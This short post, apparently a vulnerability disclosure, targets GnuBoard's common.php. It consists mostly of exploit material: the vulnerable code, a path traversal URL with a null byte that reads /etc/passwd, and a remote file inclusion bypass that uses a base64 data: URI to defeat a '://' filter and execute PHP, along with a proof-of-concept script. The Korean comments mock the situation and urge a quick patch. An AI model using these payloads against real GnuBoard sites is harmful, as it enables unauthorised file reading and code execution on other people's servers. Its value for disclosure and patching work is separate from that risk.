중국해커찾기......
/***************************

/common.php

@extract($_GET);
@extract($_POST);
@extract($_SERVER);

……

if (!$g4_path || preg_match("/:\/\//", $g4_path))
    die("<meta http-equiv='content-type' content='text/html; charset=$g4[charset]'><script language='JavaScript'> alert('잘못된 방법으로 변수가 정의되었습니다 .'); </script>");
 
//if (!$g4_path) $g4_path = ".";

$g4['path'] = $g4_path; //it's not allow char ://in $g4_path

unset($g4_path);

include_once("$g4[path]/lib/constant.php");  //file include
include_once("$g4[path]/config.php"); 
include_once("$g4[path]/lib/common.lib.php");

http://test.com/GnuBoard/common.php?g4_path=../../../../../../../etc/passwd%00
.....

when the site meets PHP >= 5.2.0&allow_url_include = On, we  can  use php data bypass preg_match("/:\/\//", $g4_path)
it's became a Remote File Include Vulnerability
poc:
/*************************

bypass_local.php
<?php
//coded by qiuren
if (!$g4_path || preg_match("/:\/\//", $g4_path))
    die("fuck");
$g4['path'] = $g4_path;
unset($g4_path);
include_once("$g4[path]/lib/constant.php");
?>

bypass_local.php?g4_path=data:;base64,PD9waHBpbmZvKCk7Lyo=

phpinfo() can be executed
***************************/

관리자빠르게패치........ㅋㅋ....